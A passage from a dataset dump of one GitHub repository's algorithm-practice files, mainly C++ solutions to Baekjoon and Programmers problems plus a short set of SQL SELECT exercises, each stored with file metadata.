i++){\n cin >> x1 >> y1 >> x2 >> y2;\n\n ans = 0;\n for(int i = x1 ; i <= x2 ; i++) ans += arr[i][y2] - arr[i][y1 - 1];\n\n cout << ans << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.37249594926834106, "alphanum_fraction": 0.4120194911956787, "avg_line_length": 21.265060424804688, "blob_id": "03a3178c1167ce6a646ef601248fb45f5cc82e8d", "content_id": "73f68633b4e522f3c4d704eb2b55188ee92c9a1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1847, "license_type": "no_license", "max_line_length": 119, "num_lines": 83, "path": "/programmers/Level 2/kakao_friends_coloringbook.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 2 : KAKAO friends coloring book\n//2017 KAKAO CODE\n//2021-05-26\n#include <vector>\n#include <algorithm>\n#include <iostream>\n#define MAX 101\nusing namespace std;\nint arr[MAX][MAX];\nbool visited[MAX][MAX];\nint cnt, area, r, c;\nint dx[] = { 0, 0, 1, -1 };\nint dy[] = { 1, -1, 0, 0 };\n\nvoid dfs(int x, int y){\n int n = arr[x][y];\n arr[x][y] = 0;\n cnt++;\n \n for(int i = 0 ; i < 4 ; i++){\n int nx = x + dx[i];\n int ny = y + dy[i];\n \n if(nx < 0 || ny < 0 || nx >= r || ny >= c || visited[nx][ny])\n continue;\n if(arr[nx][ny] == n){\n dfs(nx, ny);\n }\n }\n}\n\nvector<int> solution(int m, int n, vector<vector<int>> picture) {\n int number_of_area = 0;\n int max_size_of_one_area = 0;\n vector<int> answer(2);\n vector<int> v;\n \n cnt = area = 0;\n r = m;\n c = n;\n\n for(int i = 0 ; i < MAX ; i++){\n for(int j = 0 ; j < MAX ; j++){\n arr[i][j] = visited[i][j] = 0;\n \n }\n }\n \n for(int i = 0 ; i < m ; i++){\n for(int j = 0 ; j < n ; j++){\n arr[i][j] = picture[i][j];\n }\n } \n \n for(int i = 0 ; i < m ; i++){\n for(int j = 0 ; j < n ; j++){\n if(arr[i][j] != 0){\n cnt = 0;\n dfs(i, j);\n area++;\n v.push_back(cnt);\n }\n }\n }\n \n sort(v.begin(), v.end());\n \n answer[0] = number_of_area = area;\n answer[1] = max_size_of_one_area = v[v.size() - 1];\n return answer;\n}\n\nint main(){\n vector<vector<int>> picture = {{1, 1, 1, 0}, {1, 1, 1, 0}, {0, 0, 0, 1}, {0, 0, 0, 1}, {0, 0, 0, 1}, {0, 0, 0, 1}};\n \n vector <int> answer = solution(6, 4, picture);\n\n for(int i = 0 ; i < answer.size() ; i++){\n cout << answer[i] << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3957446813583374, "alphanum_fraction": 0.42553192377090454, "avg_line_length": 15.821428298950195, "blob_id": "023d689f428c69498c444aee4793e0006a44a39b", "content_id": "e5a5050e623e12437b912f2a09030f50dad31fa6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 476, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/BOJ/Implementation/9012.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9012번: 괄호\nDATE: 2022-04-05\n*/\n#include <iostream>\n#include <stack>\nusing namespace std;\n\nint main(){\n int t;\n cin >> t;\n\n while(t--){\n stack<char> s;\n string str;\n cin >> str;\n\n for(int i = 0 ; i < str.length() ; i++) {\n if(s.empty() || str[i] == '(') s.push(str[i]);\n else if(s.top() == '(') s.pop();\n }\n\n if(!s.empty()) cout << \"NO\\n\";\n else cout << \"YES\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3884892165660858, "alphanum_fraction": 0.42446044087409973, "avg_line_length": 17.730770111083984, "blob_id": "b944a110de3f04da15d9ffbee15f930a5788df33", "content_id": "19f218b728d1a5342dc99fe8c86c53c0384e91d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1115, "license_type": "no_license", "max_line_length": 69, "num_lines": 52, "path": "/BOJ/Binary Search/2110.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2110번: 공유기 설치\nDATE: 2021-07-01\nUPDATE: 2021-11-29\nBinary Search\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, c, start, end, mid, ans=-1;\n cin >> n >> c;\n\n int arr[n];\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n sort(arr, arr+n);\n\n start = 1;\n end = arr[n-1];\n\n while(end - start >= 0){\n int cnt=1, idx = 0; \n mid = (end + start) / 2; //공유기 사이의 거리가 최소 x 이상일 때, 가능한 최대의 x값\n\n for(int i = 1 ; i < n ; i++){\n if(arr[i] - arr[idx] >= mid) {\n idx = i; // 공유기 설치\n cnt++;\n }\n }\n\n //공유기의 개수가 c보다 작으면: 최소 거리의 최댓값 감소\n //크거나 같으면: 최소 거리의 최댓값 증가\n if(cnt < c){ \n end = mid - 1;\n }\n else if(cnt >= c){\n start = mid + 1;\n ans = max(ans, mid);\n }\n\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4766214191913605, "alphanum_fraction": 0.5037707686424255, "avg_line_length": 18.52941131591797, "blob_id": "6fa857b3c074db913bac26b4f0018dcb81c1c5f3", "content_id": "1013f0f02ca6664dd9ddd72d49c8784a11083083", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 665, "license_type": "no_license", "max_line_length": 77, "num_lines": 34, "path": "/BOJ/Binary Search/1365.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1365번: 꼬인 전깃줄\n2022-01-08\nLongest Increasing Subsequence\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n int n, num, cnt = 0;\n cin >> n;\n\n vector<int> vec;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n\n if(vec.empty()) vec.push_back(num);\n else {\n int back = vec.back();\n int idx = lower_bound(vec.begin(), vec.end(), num) - vec.begin();\n \n if(num > back) vec.push_back(num);\n else vec[idx] = num;\n }\n }\n\n cout << n - vec.size();\n\n return 0;\n}" }, { "alpha_fraction": 0.516883134841919, "alphanum_fraction": 0.5480519533157349, "avg_line_length": 15.083333015441895, "blob_id": "bf44278f241ffbedd79d060de8962000e8719777", "content_id": "23e4e411f51696848f41cd10b8dfd87a82115734", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 399, "license_type": "no_license", "max_line_length": 51, "num_lines": 24, "path": "/programmers/Level 2/remove_pair.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 짝지어 제거하기\ndate: 2022-06-01\n*/\n#include <iostream>\n#include <string>\n#include <stack>\nusing namespace std;\n\nint solution(string s)\n{\n int answer = -1;\n stack<char> st;\n \n for(auto i : s){\n if(st.empty() || st.top() != i) st.push(i);\n else st.pop();\n }\n \n if(st.empty()) answer = 1;\n else answer = 0;\n \n return answer;\n}" }, { "alpha_fraction": 0.41342756152153015, "alphanum_fraction": 0.4540635943412781, "avg_line_length": 16.18181800842285, "blob_id": "8138c51f6c6c57c7c01cf2b0d8efe24433b02d6e", "content_id": "ecaa2fbff03e1c44853a46993e763eaead2b4145", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 568, "license_type": "no_license", "max_line_length": 58, "num_lines": 33, "path": "/BOJ/Prefix Sum/10211.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10211번: Maximum Subarray\nDATE: 2022-01-23\nPrefix Sum\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int tc, n;\n \n cin >> tc;\n\n for(int i = 0 ; i < tc ; i++){\n cin >> n;\n\n int arr[n];\n int maxVal = -1e9;\n int sum = 0;\n\n for(int j = 0 ; j < n ; j++) {\n cin >> arr[j];\n sum = max(0, sum) + arr[j];\n maxVal = max(maxVal, sum);\n }\n\n cout << maxVal << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4746543765068054, "alphanum_fraction": 0.5299538969993591, "avg_line_length": 20.799999237060547, "blob_id": "b963557c536d0b4ae22e33d9fe624c8790d55508", "content_id": "e70875d860a56455af122861cc018776376fedea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 225, "license_type": "no_license", "max_line_length": 74, "num_lines": 10, "path": "/programmers/Level 2/the_biggest_number.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 가장 큰 수\n2021-12-27\n*/\nfunction solution(numbers) {\n let answer = numbers.sort((a, b) => `${b}${a}` - `${a}${b}`).join('');\n answer = answer[0] === \"0\" ? \"0\" : answer;\n\n return answer;\n}" }, { "alpha_fraction": 0.3964562714099884, "alphanum_fraction": 0.42303434014320374, "avg_line_length": 16.056604385375977, "blob_id": "4e6f764296b6835814c49109b3208a1e22293861", "content_id": "a815cae47408c916e84ec4238be82e2e036128c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 909, "license_type": "no_license", "max_line_length": 59, "num_lines": 53, "path": "/BOJ/Two Pointer/1253.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1253번: 좋다\nDATE: 2022-01-18\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n vector<int> vec;\n int n, input;\n int start, end;\n int ans = 0;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> input;\n vec.push_back(input);\n }\n\n if(n <= 2) {\n cout << 0;\n return 0;\n }\n\n sort(vec.begin(), vec.end());\n\n for(int i = 0 ; i < n ; i++) { \n vector<int> cp = vec;\n cp.erase(cp.begin() + i);\n \n start = 0; end = n - 2;\n\n while(start < end) {\n int sum = cp[start] + cp[end];\n\n if(sum == vec[i]) {\n ans++;\n break;\n }\n\n if(sum < vec[i]) start++;\n else end--;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4269340932369232, "alphanum_fraction": 0.4985673427581787, "avg_line_length": 16.5, "blob_id": "83f2985a23bc26e8f58eee0ed7c4bb0057faf9e8", "content_id": "c75f7fe3e3a9d6267b2d68d682edc033875f7f93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 369, "license_type": "no_license", "max_line_length": 58, "num_lines": 20, "path": "/BOJ/Implementation/11721.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 11721번: 열 개씩 끊어 출력하기\n//2021-05-04\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n cin >> str;\n\n while(1){\n if(str.length() == 0)\n break;\n \n cout << str.substr(0, 10) << '\\n';\n str.erase(0, 10);\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4141252040863037, "alphanum_fraction": 0.43338683247566223, "avg_line_length": 18.793651580810547, "blob_id": "d290e3a8cb30727f0c4232db330006fa78762cc2", "content_id": "e26bef202e06a4d90bf2ebc82eb0b569deb2f24c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1274, "license_type": "no_license", "max_line_length": 65, "num_lines": 63, "path": "/BOJ/Binary Search/2143.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2143번: 두 배열의 합\nDATE: 2022-02-09\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n int t, n, m, num;\n long long sum, ans = 0;\n\n vector<long long> a, b, aSum, bSum;\n\n cin >> t >> n;\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n a.push_back(num);\n }\n\n cin >> m;\n for(int i = 0 ; i < m ; i++) {\n cin >> num;\n b.push_back(num);\n }\n \n for(int i = 0 ; i < n ; i++){\n aSum.push_back(a[i]);\n sum = a[i];\n\n for(int j = i + 1 ; j < n ; j++){\n sum += a[j];\n aSum.push_back(sum);\n }\n }\n\n for(int i = 0 ; i < m ; i++){\n bSum.push_back(b[i]);\n sum = b[i];\n\n for(int j = i + 1 ; j < m ; j++){\n sum += b[j];\n bSum.push_back(sum);\n }\n }\n\n sort(bSum.begin(), bSum.end());\n\n for(int i = 0 ; i < aSum.size() ; i++) {\n int diff = t - aSum[i]; \n\n auto lower = lower_bound(bSum.begin(), bSum.end(), diff);\n auto upper = upper_bound(bSum.begin(), bSum.end(), diff);\n\n ans += upper - lower; //bSum에 존재하는 diff의 개수\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.41085270047187805, "alphanum_fraction": 0.4635658860206604, "avg_line_length": 13.333333015441895, "blob_id": "0eeab2843df378d4ab245900eeb287088a54a263", "content_id": "932b431475a28bdf9f74e99c2cb61577f063345c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 677, "license_type": "no_license", "max_line_length": 55, "num_lines": 45, "path": "/BOJ/Greedy/11501.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 11501번: 주식\nDATE: 2021-01-10\n*/\n#include <iostream>\nusing namespace std;\nint price[1000000] = { 0, };\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n\tint t, n, max;\n\tlong long ans;\n\n\tcin >> t;\n\tfor (int i = 0; i < t; i++) {\n\t\tcin >> n;\n\t\tfor (int j = 0; j < n; j++) {\n\t\t\tcin >> price[j];\n\t\t}\n\n\t\tans = 0;\n\t\tmax = price[n-1]; \n\n\t\tfor (int k = n-1 ; k >= 0 ; k--) {\n\t\t\tif (price[k] > max) { //가장 큰 주가\n\t\t\t\tmax = price[k];\n\t\t\t}\n\t\t\telse if (price[k] < max) { //이익 발생\n\t\t\t\tans += max - price[k];\n\t\t\t}\n\t\t}\n\n\t\tif (max == price[0]) { //최대 이익 0\n\t\t\tcout << 0 << \"\\n\";\n\t\t\tcontinue;\n\t\t}\n\n\t\tcout << ans << \"\\n\";\n\n\t}\n\n\treturn 0;\n\n}\n" }, { "alpha_fraction": 0.47686833143234253, "alphanum_fraction": 0.5088967680931091, "avg_line_length": 17.161291122436523, "blob_id": "7c889d80877a9a1939650d8f6100c422ab9d8a06", "content_id": "0ef42b8f7cd1374b874619244339315c96b80082", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 572, "license_type": "no_license", "max_line_length": 58, "num_lines": 31, "path": "/BOJ/Implementation/1181.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1181번: 단어 정렬\nDATE: 2021-04-29\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<pair<int, string>> v;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n string str;\n cin >> str;\n v.push_back(make_pair(str.length(), str));\n }\n\n sort(v.begin(), v.end());\n v.erase(unique(v.begin(), v.end()), v.end()); \n\n for(int i = 0 ; i < v.size() ; i++){\n cout << v[i].second << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4153132140636444, "alphanum_fraction": 0.45475637912750244, "avg_line_length": 14.428571701049805, "blob_id": "bc5875c6809b1a3ccdb3d727e488a65c28ec5f49", "content_id": "26b819a3ac3204940201b782a000d2b8eaf64208", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 439, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/BOJ/Mathematics/1735.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1735번: 분수 합\nDATE: 2022-03-16\n*/\n#include <iostream>\nusing namespace std;\n\nint gcd(int n, int m){\n if(m == 0) return n;\n else return gcd(m, n % m);\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b, c, d;\n int n, m;\n \n cin >> a >> b >> c >> d;\n \n n = a * d + b * c;\n m = b * d;\n\n int div = gcd(n, m);\n\n cout << n / div << \" \" << m / div;\n \n return 0;\n}" }, { "alpha_fraction": 0.3262890875339508, "alphanum_fraction": 0.34234994649887085, "avg_line_length": 20.527273178100586, "blob_id": "f267eb75547bed8f8a1d671c3367d30031430e3c", "content_id": "a31835b108b27521c552cd9bf4e3270757e904f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1211, "license_type": "no_license", "max_line_length": 58, "num_lines": 55, "path": "/BOJ/Implementation/1966.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1966번: 프린터 큐\n2021-10-14\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int tc, n, m, num;\n cin >> tc;\n\n for(int i = 0 ; i < tc ; i++) {\n queue<pair<int,int>> q;\n priority_queue<int> pq;\n int order = 1, idx;\n\n cin >> n >> m;\n\n for(int j = 0 ; j < n ; j++) {\n cin >> num;\n q.push(make_pair(num, j)); // 중요도, 순서\n pq.push(num);\n\n if(j == m) idx = j; // 목표 문서\n }\n\n int max = pq.top();\n\n while(!q.empty()) {\n pair<int, int> cur = q.front();\n\n if(cur.first < max) {\n while(cur.first != max) {\n q.push(q.front()); q.pop();\n cur = q.front();\n }\n }\n else {\n if(cur.second == idx) {\n cout << order << '\\n';\n break;\n }\n else {\n q.pop(); pq.pop();\n max = pq.top();\n order++;\n }\n }\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.37987011671066284, "alphanum_fraction": 0.4253246784210205, "avg_line_length": 16.13888931274414, "blob_id": "0209841caccc6e521050f001afc054b425e44388", "content_id": "1dcbc4a8c693b653297414c960f312f9e1d3faa1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 626, "license_type": "no_license", "max_line_length": 69, "num_lines": 36, "path": "/BOJ/Mathematics/15965.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15965번: K번째 소수\n2022-01-29\n*/\n#include <iostream>\n#include <math.h>\n#define MAX 7400000\nusing namespace std;\n\nint isNotPrime[MAX];\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int k, cnt = 0;\n cin >> k;\n\n for(int i = 2 ; i <= sqrt(MAX) ; i++) {\n if(!isNotPrime[i]) {\n for(int j = i * i ; j <= MAX ; j += i) isNotPrime[j] = 1;\n }\n }\n\n for(int i = 2 ; i <= MAX ; i++) {\n if(!isNotPrime[i]) {\n cnt++;\n\n if(cnt == k) {\n cout << i;\n break;\n }\n }\n }\n\n\n return 0;\n}" }, { "alpha_fraction": 0.380952388048172, "alphanum_fraction": 0.4238095283508301, "avg_line_length": 14.774999618530273, "blob_id": "b2f79c2cb4818a919ce21715985a9ae16f662bbb", "content_id": "0ba70e4d5171db341101d7882072effc1939a41d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 640, "license_type": "no_license", "max_line_length": 58, "num_lines": 40, "path": "/BOJ/Two Pointer/2003.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2003번: 수들의 합 2\nDATE: 2021-06-01\nTwo Pointer\n*/\n#include <iostream>\n#define MAX 10001\nusing namespace std;\n\nint arr[MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int start=0, end=0, sum=0, answer=0;\n int n, m;\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n \n while(end <= n){\n if(sum < m){\n sum += arr[end];\n end++;\n }\n else if(sum >= m){\n sum -= arr[start];\n start++;\n }\n\n if(sum == m){\n answer++;\n }\n }\n\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.4124087691307068, "alphanum_fraction": 0.45985400676727295, "avg_line_length": 16.510639190673828, "blob_id": "ba82e3cb497d95bbe9bdb07ef91c8cd5b8bc898c", "content_id": "dede551a744fffa4b39c9f02a80253afc8fc5703", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 832, "license_type": "no_license", "max_line_length": 58, "num_lines": 47, "path": "/BOJ/Sliding Window/15961.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15961번: 회전 초밥\nDATE: 2021-08-03\nSliding Window\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint arr[3000001];\nint sushi[3001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, d, k, c, cnt=0, ans=-1;\n int start, end, total;\n cin >> n >> d >> k >> c;\n\n for(int i = 0 ; i < n ; i++)\n cin >> arr[i];\n for(int i = 0 ; i < k ; i++){\n sushi[arr[i]]++;\n if(sushi[arr[i]] == 1) cnt++;\n }\n\n if(++sushi[c] == 1) cnt++;\n\n start = 0;\n end = k - 1;\n\n while(start < n){\n ans = max(ans, cnt);\n end = (end + 1) % n;\n\n sushi[arr[start]]--;\n if(sushi[arr[start]] == 0) cnt--;\n\n sushi[arr[end]]++;\n if(sushi[arr[end]] == 1) cnt++;\n\n start++;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.6295694708824158, "alphanum_fraction": 0.681559681892395, "avg_line_length": 16.338027954101562, "blob_id": "dd0715e8c9b6c2a3db30d8c1d553fd320b04357b", "content_id": "1aa72ea846820fcd45a9662c2f0a0c056628cdcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1335, "license_type": "no_license", "max_line_length": 89, "num_lines": 71, "path": "/programmers/SQL/SELECT.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# SELECT\n\n**[1. 모든 레코드 조회하기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59034)**\n\n```sql\nSELECT *\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[2. 역순 정렬하기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59035)**\n\n```sql\nSELECT NAME, DATETIME\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID DESC\n```\n\n<br/>\n\n**[3. 아픈 동물 찾기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59036)**\n\n```sql\nSELECT ANIMAL_ID, NAME\nFROM ANIMAL_INS\nWHERE INTAKE_CONDITION = 'SICK'\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[4. 어린 동물 찾기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59037)**\n\n```sql\nSELECT ANIMAL_ID, NAME FROM ANIMAL_INS\nWHERE INTAKE_CONDITION != 'Aged'\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[5. 동물의 아이디와 이름 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59403)**\n\n```sql\nSELECT ANIMAL_ID, NAME\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[6. 여러 기준으로 정렬하기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59404)**\n\n```sql\nSELECT ANIMAL_ID, NAME, DATETIME\nFROM ANIMAL_INS\nORDER BY NAME, DATETIME DESC\n```\n\n<br/>\n\n**[7. 상위 n개 레코드 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59405)**\n\n```sql\nSELECT NAME\nFROM ANIMAL_INS\nORDER BY DATETIME\nLIMIT 1\n```\n" }, { "alpha_fraction": 0.42227378487586975, "alphanum_fraction": 0.4617169499397278, "avg_line_length": 16.97916603088379, "blob_id": "f6ac31649aa827bf5fd420da0af9a27484847e3d", "content_id": "57b2d478985c1fffbcc331f6a46dd15e5db2f48d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 872, "license_type": "no_license", "max_line_length": 58, "num_lines": 48, "path": "/BOJ/BFS_DFS/15900.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15900번: 나무 탈출\nDATE: 2021-09-10\nDFS\n*/\n#include <iostream>\n#include <vector>\n#define MAX 500001\nusing namespace std;\n\nint n, total=0;\nvector<int> v[MAX];\nint visited[MAX];\n\nvoid dfs(int node, int depth){\n visited[node] = true;\n\n if(node != 1 && v[node].size() == 1){ //leaf node\n total += depth;\n }\n else {\n for(int i = 0 ; i < v[node].size() ; i++){\n if(!visited[v[node][i]]){\n dfs(v[node][i], depth + 1);\n visited[v[node][i]] = false;\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b;\n cin >> n;\n\n for(int i = 0 ; i < n - 1 ; i++){\n cin >> a >> b;\n v[a].push_back(b);\n v[b].push_back(a);\n }\n\n dfs(1, 0);\n\n if(total % 2 == 0) cout << \"No\\n\";\n else cout << \"Yes\\n\";\n\n return 0;\n}" }, { "alpha_fraction": 0.43296703696250916, "alphanum_fraction": 0.4879120886325836, "avg_line_length": 14.199999809265137, "blob_id": "d6e644cad9a3d12a2fb252860208a1a702d37406", "content_id": "6f4b35d5faef458bc1119d171ae98a3315802e6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 505, "license_type": "no_license", "max_line_length": 55, "num_lines": 30, "path": "/BOJ/Greedy/11047.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 11047번: 동전 0\nDATE: 2021-01-10\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\tint n, k, val, cnt=0;\n\tint arr[10];\n\n\tcin >> n >> k;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tcin >> val;\n\t\tarr[i] = val;\n\t}\n\n\tfor (int i = n-1 ; i >= 0; i--) {\n\t\tif (k / arr[i] > 0) { //몫이 양수이면\n\t\t\tcnt += k / arr[i]; //동전 개수 더함\n\t\t\tk -= arr[i] * (k / arr[i]); //위에서 더한 값만큼 빼줌\n\t\t}\n\t}\n\n\tcout << cnt;\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.470703125, "alphanum_fraction": 0.4970703125, "avg_line_length": 17.636363983154297, "blob_id": "30b143ae8a82ee22f37874e522d2f291f8ca6936", "content_id": "c2c688fe0c56e0085c6a63c9211253925f656a56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1034, "license_type": "no_license", "max_line_length": 68, "num_lines": 55, "path": "/BOJ/MST/16398.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16398번: 행성 연결\nDATE: 2022-03-02\nPrim Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 1001\n#define pii pair<int,int>\nusing namespace std;\n\nvector<pii> edge[MAX];\nbool visited[MAX];\n\nlong long prim(){\n long long ans = 0;\n priority_queue<pii, vector<pii>, greater<pii>> pq;\n pq.push({0, 1});\n \n while(!pq.empty()){\n int dis = pq.top().first;\n int cur = pq.top().second;\n pq.pop();\n\n if(visited[cur]) continue;\n visited[cur] = true;\n ans += dis;\n\n for(int i = 0 ; i < edge[cur].size() ; i++){\n if(!visited[edge[cur][i].second]) pq.push(edge[cur][i]);\n }\n }\n\n return ans;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num;\n cin >> n;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n cin >> num;\n\n if(i == j) continue;\n edge[i].push_back({num, j});\n }\n }\n\n cout << prim();\n\n return 0;\n}" }, { "alpha_fraction": 0.39371258020401, "alphanum_fraction": 0.428143709897995, "avg_line_length": 17.58333396911621, "blob_id": "978ceeb65f295e11400e49cc2ca0f0021b856216", "content_id": "87ef34ef43ae724fc88bf0644de349146e0a0ce2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 678, "license_type": "no_license", "max_line_length": 58, "num_lines": 36, "path": "/BOJ/Brute Force/1543.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1543번: 문서 검색\nDATE: 2021-04-04\n*/\n#include <iostream>\n#include <string>\n\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int cnt = 0, ans=0;\n string str, search;\n\n getline(cin, str);\n getline(cin, search);\n\n for(int i = 0 ; i < str.size() ; i++){\n if(str[i] == search[0]){\n for(int j = 0 ; j < search.size() ; j++){\n if(str[i++] == search[j]) cnt++;\n }\n\n if(cnt == search.size()){\n ans++;\n i -= 1;\n }\n else i -= search.size();\n }\n cnt = 0;\n }\n\n cout << ans;\n\n return 0;\n}" } ]
270
roydulal/Flask_Heruku_Pipline
https://github.com/roydulal/Flask_Heruku_Pipline
e6f2802d396fbfd8457c9de09b6edd636599a599
